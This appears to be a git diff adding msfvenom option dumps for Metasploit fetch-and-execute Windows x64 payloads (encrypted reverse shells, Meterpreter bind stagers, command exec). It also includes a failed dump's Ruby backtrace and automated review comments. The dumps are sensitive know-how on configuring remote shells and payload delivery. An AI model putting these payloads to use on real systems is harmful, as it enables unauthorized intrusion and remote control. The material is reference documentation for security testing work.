+ + Tunnel communication over HTTPS (Windows x64 winhttp) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyIE true no Enable use of IE proxy settings + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate hash in the handler + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell-reverse_tcp.txt new file mode 100644 index 0000000..cc67991 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell-reverse_tcp.txt 
@@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager + Module: payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + Matt Graeber + Shelby Pace + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CallWSAStartup true no Adds the function that initializes the Winsock library +ChachaKey 564ca178cb11cc05b849fd30ed4ff245 no The initial key to encrypt payload traffic with +ChachaNonce fbc2e693d1fc no The initial nonce to use to encrypt payload traffic with +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME rRzVrltYfA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (staged). + + Connect to MSF and read in stage + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + KeepExe false no Keep executable after compiling the payload + KeepSrc false no Keep source code after compiling it + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OptLevel O2 no The optimization level to compile with (Accepted: Og, Os, O0, O1, O2, O3) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking true yes 
Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShowCompileCMD false no Display the command used to compile payload + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StripSymbols true no Payload will be compiled without symbols + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell_reverse_tcp.txt new file mode 100644 index 0000000..eeda82c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell_reverse_tcp.txt 
@@ -0,0 +1,86 @@ + + Name: HTTP Fetch, Windows Encrypted Reverse Shell + Module: payload/cmd/windows/http/x64/encrypted_shell_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + Matt Graeber + Shelby Pace + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CallWSAStartup true no Adds the function that initializes the Winsock library +ChachaKey dd744743740715ec998e1efd5ac41906 no The initial key to encrypt payload traffic with +ChachaNonce 6fbcbd62f796 no The initial nonce to use to encrypt payload traffic with +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME FGysnoEdPz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn an encrypted command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + KeepExe false no Keep executable after compiling the payload + KeepSrc false no Keep source code after compiling it + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OptLevel O2 no The optimization level to compile with (Accepted: Og, Os, O0, O1, O2, O3) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking true yes Whether or not to automatically register generated UUIDs + 
PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShowCompileCMD false no Display the command used to compile payload + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StripSymbols true no Payload will be compiled without symbols + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-exec.txt b/msfvenom/payload_options/cmd-windows-http-x64-exec.txt new file mode 100644 index 0000000..9fc8997 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-exec.txt 
@@ -0,0 +1,61 @@ + + Name: HTTP Fetch, Windows x64 Execute Command + Module: payload/cmd/windows/http/x64/exec + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ZYiHMftPEs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Execute an arbitrary command (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-loadlibrary.txt b/msfvenom/payload_options/cmd-windows-http-x64-loadlibrary.txt new file mode 100644 index 0000000..1fb17e0 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-loadlibrary.txt @@ -0,0 +1,9 @@ +Options for payload/cmd/windows/http/x64/loadlibrary: +========================= + +/usr/share/metasploit-framework/modules/payloads/singles/windows/x64/loadlibrary.rb:58:in `generate': wrong number of arguments (given 1, expected 0) (ArgumentError) + from /usr/share/metasploit-framework/lib/msf/core/payload/adapter/fetch.rb:94:in `generate' + from /usr/share/metasploit-framework/lib/msf/core/payload.rb:195:in `size' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:500:in `dump_payload_module' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:26:in `dump_module' + from /usr/bin/msfvenom:461:in `
' diff --git a/msfvenom/payload_options/cmd-windows-http-x64-messagebox.txt b/msfvenom/payload_options/cmd-windows-http-x64-messagebox.txt new file mode 100644 index 0000000..bb25d68 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-messagebox.txt 
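Review bot: cmd-windows-http-x64-loadlibrary.txt commits a Ruby backtrace instead of the module's option table, so the dump is not usable as documentation. The trace shows `loadlibrary.rb:58:in `generate'` rejecting the one argument that `fetch.rb:94:in `generate'` passes ("wrong number of arguments (given 1, expected 0)"), which is a framework-side mismatch between the fetch adapter and the loadlibrary single rather than anything the generation script did wrong. Either drop this file from the commit and record the failure in the commit message, or keep a placeholder that states the options could not be dumped, and regenerate it once the two `generate` signatures agree; as committed, a reader grepping these files for options will hit a stack trace.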
@@ -0,0 +1,63 @@ + + Name: HTTP Fetch, Windows MessageBox x64 + Module: payload/cmd/windows/http/x64/messagebox + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + pasta + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME biAAGvOPG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +ICON NO yes Icon type (Accepted: NO, ERROR, INFORMATION, WARNING, QUESTION) +TEXT Hello, from MSF! yes Messagebox Text +TITLE MessageBox yes Messagebox Title + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a dialog via MessageBox using a customizable title, text & icon + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp.txt new file mode 100644 index 0000000..b3b442d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp.txt 
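Review bot: in cmd-windows-http-x64-messagebox.txt (and every other fetch payload dump in this commit) the `FETCH_FILENAME` default is a freshly randomised string (`biAAGvOPG` here, `ZYiHMftPEs` in the exec dump), so each regeneration of these files will produce a spurious one-line diff per payload that hides real option changes. If the dumps are meant to be regenerated, pass a fixed `FETCH_FILENAME` on the msfvenom command line when producing them, or post-process the line to a placeholder such as `<random>`, so that the committed files are reproducible.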
@@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME QvMMtlhNsuT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..8394ae7 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp_uuid.txt 
@@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME cQRzuQIwacZO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_named_pipe.txt new file mode 100644 index 0000000..d17d085 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_named_pipe.txt 
@@ -0,0 +1,96 @@ + + Name: HTTP Fetch, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/meterpreter/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME muMiieiQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
